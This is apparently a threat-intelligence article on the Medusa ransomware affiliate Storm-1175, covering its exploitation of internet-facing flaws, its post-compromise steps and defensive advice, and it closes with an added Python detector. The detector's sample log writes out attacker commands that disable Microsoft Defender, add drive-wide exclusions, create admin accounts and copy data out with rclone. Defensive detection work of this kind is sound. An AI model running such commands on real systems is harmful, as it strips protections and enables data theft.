A ransomware operation that Microsoft tracks as Storm-1175 is compromising organizations by exploiting vulnerabilities in internet-facing assets. The group deploys Medusa ransomware and can reach full network compromise in as little as 24 hours by striking in the window between a vulnerability’s disclosure and its patching. Because it exploits both publicly known flaws and zero-days, the group is a significant and evolving threat to organizations worldwide, particularly those that expose applications such as mail servers and file transfer tools to the internet.
Microsoft Threat Intelligence has tracked Storm-1175 since 2023 and has observed it exploit more than 16 known vulnerabilities across a range of enterprise products. What sets the group apart is its speed against “N-day” vulnerabilities: flaws that have been publicly disclosed but remain unpatched on a large number of systems. The actors scan the internet for vulnerable applications and gain initial access during even brief exposure windows, which lets them deploy Medusa before defenders have finished responding to the advisory.
Storm-1175’s Exploitation of Zero-Day Flaws
Beyond known vulnerabilities, Microsoft analysts have confirmed that Storm-1175 also exploits zero-day flaws, vulnerabilities that are not yet publicly known or documented. The group exploited CVE-2026-23760, a SmarterMail flaw, a full week before its public disclosure, and CVE-2025-10035 in Fortra’s GoAnywhere Managed File Transfer one week before that vulnerability was announced. Zero-day use sharply raises the threat the group poses: during that week no patch exists, so routine patch management cannot stop the initial intrusion, and defenders are left relying on limiting the internet exposure of such services and on detecting the post-exploitation activity described below.
Medusa itself is run as Ransomware-as-a-Service (RaaS): its developers lease the encryptor and supporting infrastructure to affiliates such as Storm-1175. Medusa uses a double-extortion model, both encrypting victim data and exfiltrating it, then threatening to publish the stolen data unless a ransom is paid. Combining operational disruption with the long-term risk of sensitive data being leaked puts considerable pressure on victims, which is what makes Medusa incidents particularly damaging.
Inside Storm-1175’s Post-Compromise Playbook
Once Storm-1175 is inside a target environment, its operations follow a consistent and rapid sequence. The first step is usually to plant a web shell or deploy a remote access payload so that access survives even after the original vulnerability is patched. At the same time the group creates new user accounts as backup access paths, so that removing the web shell alone does not evict them.
With persistence in place, Storm-1175 brings in legitimate remote monitoring and management (RMM) tools, which let its activity blend into normal IT traffic and make detection harder. To weaken defenses, the attackers tamper with Microsoft Defender Antivirus settings by modifying the Windows registry, a step that requires elevated privileges. They also run Base64-encoded PowerShell commands that add entire drives to the antivirus exclusion list, so Defender no longer scans for malicious files on those drives.
Credential theft is central to the playbook, targeting the high-privilege accounts needed to deploy ransomware across the entire network. When the operation is ready to conclude, Storm-1175 uses Bandizip to compress the collected files and Rclone to copy them to attacker-controlled cloud storage. PDQ Deployer is then used to run a script named “RunFileCopy.cmd”, which pushes the Medusa ransomware payload to every reachable machine. In some intrusions, to detonate everywhere at once, the group uses its elevated privileges to trigger a Group Policy update that distributes the ransomware to all domain-joined systems.
Microsoft and other security researchers urge organizations to patch internet-facing systems promptly, within 72 hours for any vulnerability listed in the CISA Known Exploited Vulnerabilities catalog. Security teams should raise their monitoring of alerts for credential theft, unauthorized registry modifications and the creation of new user accounts, since these are strong indicators of an active compromise; Defender configuration changes such as new exclusions are also recorded in the Microsoft-Windows-Windows Defender/Operational log as event ID 5007. Restrict RMM software to an approved list, enforce multi-factor authentication on all privileged accounts, and audit antivirus exclusion paths regularly so unauthorized changes are caught before attackers can make use of them.
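The defense-evasion and persistence commands in the playbook above, and the monitoring advice that follows from them, are easiest to reason about with a concrete detector. The Python script below is an added example written for this page, not code from Microsoft or from the Storm-1175 report. It scans constructed process-creation log lines (sample data, not real telemetry) for encoded PowerShell that adds a whole drive to Defender exclusions, Defender being disabled through Set-MpPreference or the Windows Defender policy registry keys, local account creation, and Rclone transfers, and then surfaces accounts that chain several of these techniques. The log format, the specific registry value names and cmdlet switches, and the notion that Storm-1175 used exactly these commands are assumptions made for the example; the article only says the group edits Defender registry settings and adds drives to the exclusion list with encoded PowerShell.

```python
"""Detection sketch for the Storm-1175 post-compromise chain described above.

Added example, not the vendor's or the report's code. Scans Windows
process-creation style log lines (constructed samples, not real telemetry) for
encoded PowerShell adding whole drives to Defender exclusions, Defender disabled
via cmdlet or registry, new local accounts, and Rclone transfers. The registry
value names and cmdlet flags are real Defender settings, but which of them
Storm-1175 touched is an assumption; the article does not name them.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample lines in the form "<timestamp> <user> <command line>". Not real telemetry.
SAMPLE_LOG = [
    "2025-10-01T02:14:07Z CORP\\svc_backup powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_powershell("Add-MpPreference -ExclusionPath 'C:\\'"),
    "2025-10-01T02:14:09Z CORP\\svc_backup powershell.exe -enc "
    + encode_powershell("Add-MpPreference -ExclusionPath 'D:\\'; Set-MpPreference -DisableRealtimeMonitoring $true"),
    '2025-10-01T02:15:30Z CORP\\svc_backup reg.exe add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    "2025-10-01T02:16:02Z CORP\\svc_backup net.exe user helpdesk2 Winter2025! /add",
    "2025-10-01T02:16:05Z CORP\\svc_backup net.exe localgroup administrators helpdesk2 /add",
    "2025-10-01T03:40:11Z CORP\\svc_backup rclone.exe copy C:\\staging\\archive.zip remote:bucket/in --transfers 8",
    # Benign activity that must not fire: an ordinary command and a scoped folder exclusion.
    "2025-10-01T09:00:00Z CORP\\jdoe powershell.exe -Command Get-ChildItem C:\\Users\\jdoe\\Documents",
    "2025-10-01T09:05:00Z CORP\\itadmin powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\\Program Files\\BuildAgent\\work'",
]

# powershell.exe accepts -EncodedCommand and its abbreviations -e, -ec and -enc.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# (technique label, pattern). Patterns run against the decoded script when the
# command line carried -EncodedCommand, otherwise against the raw command line.
RULES = [
    # Only a bare drive root (C:\ or D:) counts; a scoped folder exclusion is routine admin work.
    ("defender-exclusion-drive-root",
     re.compile(r"""-ExclusionPath\s+['"]?[A-Za-z]:\\?['"]?(?=[\s;,]|$)""", re.I)),
    ("defender-disabled-via-cmdlet",
     re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$true", re.I)),
    ("defender-disabled-via-registry",
     re.compile(r"Windows Defender.*?/v\s+Disable\w+.*?/d\s+1\b", re.I)),
    ("local-account-created",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("local-admin-group-modified",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("rclone-transfer",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    timestamp: str
    user: str
    technique: str
    evidence: str


def decode_encoded_powershell(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_line(line: str):
    """Yield a Finding for every rule the line (or its decoded script) matches."""
    timestamp, user, cmdline = line.split(" ", 2)
    decoded = decode_encoded_powershell(cmdline)
    text = decoded if decoded is not None else cmdline
    for technique, pattern in RULES:
        if pattern.search(text):
            prefix = "decoded: " if decoded is not None else ""
            yield Finding(timestamp, user, technique, prefix + text)


def scan(lines):
    """Run every rule over every line and return the findings in log order."""
    return [f for line in lines for f in analyse_line(line)]


def suspicious_users(findings, min_techniques: int = 3):
    """Accounts that chain several distinct techniques; the chain is the signal, not one alert."""
    by_user = defaultdict(set)
    for f in findings:
        by_user[f.user].add(f.technique)
    return sorted(u for u, t in by_user.items() if len(t) >= min_techniques)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.timestamp} {f.user:20} {f.technique:32} {f.evidence}")
    print("accounts to triage:", suspicious_users(results))
```

Run it directly to print findings for the sample data, or feed real command lines into scan(). The scoped folder exclusion on the itadmin line deliberately does not fire: what the article describes is a bare drive root added by encoded PowerShell, and the real signal is one account chaining several of these techniques in a short window rather than any single command. On a live host, Get-MpPreference lists the current ExclusionPath entries for the same audit.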

